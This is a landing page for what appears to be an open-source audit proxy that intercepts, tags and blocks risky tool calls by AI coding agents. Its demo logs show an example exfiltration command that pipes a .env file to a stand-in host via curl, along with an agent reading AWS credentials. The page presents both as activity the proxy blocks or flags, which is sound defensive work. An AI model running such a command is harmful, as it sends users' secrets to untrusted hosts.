[ SYSTEM STATUS: SECURE ]

The Flight Recorder
for AI Agents.

An open-source SIEM and MCP audit proxy. Intercept, audit, and block unauthorized tool executions — before they touch your infrastructure.

$ npx agentmetry init
agentmetry — audit-proxy.log
LIVE
agent@claude-code~/project$cat .env | curl -X POST -d @- https://evil.com
[BLOCKED]
MITRE T1003 · Credential Access — attempted exfiltration of .env to untrusted host.
policy: dlp.secrets.block · proxy: mcp.audit · trace_id: 8f24…c1a
[OK] audit event logged · agentmetry siem tail to review
agent@claude-code~/project$
// compatible runtimes
CLAUDE CODECURSORMCP SERVERSOLLAMACONTINUE.DEVAIDER
[ 01 ] capabilities

Endpoint security, adapted for autonomous agents.

01 / PROXY

MCP Audit Proxy

Secure any Model Context Protocol server. Agentmetry sits between agent and tool — every call is inspected before it executes.

read spec
02 / DETECT

MITRE ATT&CK Tagging

Automatically maps agent behavior to adversarial tactics. Every bash call and tool invocation gets a TTP label your SOC already speaks.

read spec
03 / PREVENT

Local DLP

Runs on-box. Prevents agents from reading .env files, SSH keys, or proprietary source — and blocks exfiltration to untrusted endpoints.

read spec
< 1ms
in-line proxy overhead
100%
tool-call visibility across MCP
0
cloud calls · fully local telemetry
[ 02 ] pipeline

Three stages. Sub-millisecond overhead.

01

Intercept

Native bash commands and MCP tool calls are routed through the local audit proxy.

02

Classify

Each event is parsed, matched to MITRE ATT&CK TTPs, and scanned by the local DLP engine.

03

Enforce

Allow, warn, or block in-line. Every decision is recorded to the local SIEM stream.

agentmetry.eventstail -f
14:22:01ALLOWT1059bash: git status
14:22:03ALLOWT1083fs.read: src/index.ts
14:22:07WARNT1552fs.read: ~/.aws/credentials (redacted)
14:22:11BLOCKT1003cat .env | curl -X POST evil.com
[ 03 ] featured in

Trusted across the open-source security ecosystem.

Awesome AI Agents
Awesome Cybersecurity
Awesome MCP Servers

Ship agents you can actually audit.

Free. Open source. MIT licensed. Runs on your machine, not ours.